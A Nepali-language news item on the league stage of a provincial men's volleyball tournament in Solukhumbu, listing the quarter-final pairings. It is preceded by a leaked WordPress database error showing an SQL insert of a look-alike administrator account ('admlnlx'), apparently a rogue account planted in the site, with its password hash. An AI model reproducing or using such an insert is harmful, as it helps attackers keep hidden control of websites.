WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BpVZKjdo57r.ZwG7Ws8iDekTbwi8bN.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 10:12:08', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, सोलुखुम्बु । सोलुखुम्बुको सदारमुकाम सल्लेरी स्थित योङ स्टार क्लबको खेलमैदानमा हिजोबाट शुरु भएको प्रदेशस्तरीय तेस्रो मदन स्मृति पुरुष भलिबल प्रतियोगिताको लिग चरणका सबै खेल सकिएका छन् ।
प्रतियोगितामा प्रदेश नम्बर १ का १३ जिल्लाको सहभागीता रहेको थियो । उक्त सहभागीता टिमलाई चार समूहमा राखेर खेल खेलाईएको थियो ।
लिक चरनबाट क्वार्टर फाइनलमा प्रवेश गर्ने जिल्लाहरु सोलुखुम्बु र खोटाङ, झापा र सङ्खुवासभा, सुनसरी र धनकुटा, ओखलढुङ्गा र भोजपुर प्रतिस्पर्धा गर्नेछन् । इलाम, उदयपुर, पाँचथर, मोरङ र तेह्रथुम जिल्ला भने लिग चरणबाट बाहिरिएका छन् । क्वाटर फाइनलको खेल भोली दस बजेबाट सन्चालन हुने आयोजकले जनाएको छ ।